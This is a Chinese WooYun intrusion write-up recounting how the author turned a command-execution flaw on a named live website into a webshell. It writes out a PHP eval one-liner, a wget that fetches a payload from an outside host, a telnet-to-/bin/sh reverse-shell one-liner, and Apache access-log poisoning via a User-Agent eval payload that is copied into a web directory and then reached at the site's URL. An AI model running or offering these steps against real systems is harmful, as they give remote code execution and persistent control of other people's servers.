WooYun.org

一处犀利的命令执行

pwd看向当前网站路径：
/home/member/www/live/domainv2
找是否有可写目录：

果断写shell啊
echo "<?php eval(\$_POST[l])?>" > /home/member/www/live/upload/111.php
cat下看看
cat /home/member/www/live/upload/111.php

妈蛋的什么都没有，什么情况，可能有特殊字符过滤了，继续黑盒测试。
换wget再试试：
wget http://bluetest.duapp.com/eval.txt -O /home/member/www/live/upload/zzz.php
依然失败。
linux一条命令直接反弹端口回来试下：
telnet x.x.x.x 1111 | /bin/sh | telnet x.x.x.x 2222

发现弹回来了，但是会马上断开连接，后来才知道FreeBSD的是Unix的不支持这种。。。

把shell写进系统里，然后mv到web目录下试试~
试一下apache日志的方式
进程中找到apache的路径
ps -aux
找到apache配置文件
cat /usr/local/apache/conf/httpd.conf
找到日志地址
tail -100 /usr/local/apache/logs/access_log

把浏览器UA改成
<?php eval($_POST[l]);?>
然后tail几遍看看日志

干的漂亮，导出到web目录试试~
tail -1000 /usr/local/apache/logs/access_log > /home/member/www/live/upload/a.php
访问一下a.php：

一句话连接
http://www.dns.com.cn/upload/a.php

你也可以试下grep出eval来导出大小会小很多，不过1000行还好~
看了下/var/log目录下的一些日志文件：
检查新生成php文件
/var/log/find_new_php.log
检查危险函数
/var/log/check_dangerous.log
监控做的挺好，但是检查出的那么多危险函数怎么就不管了呢~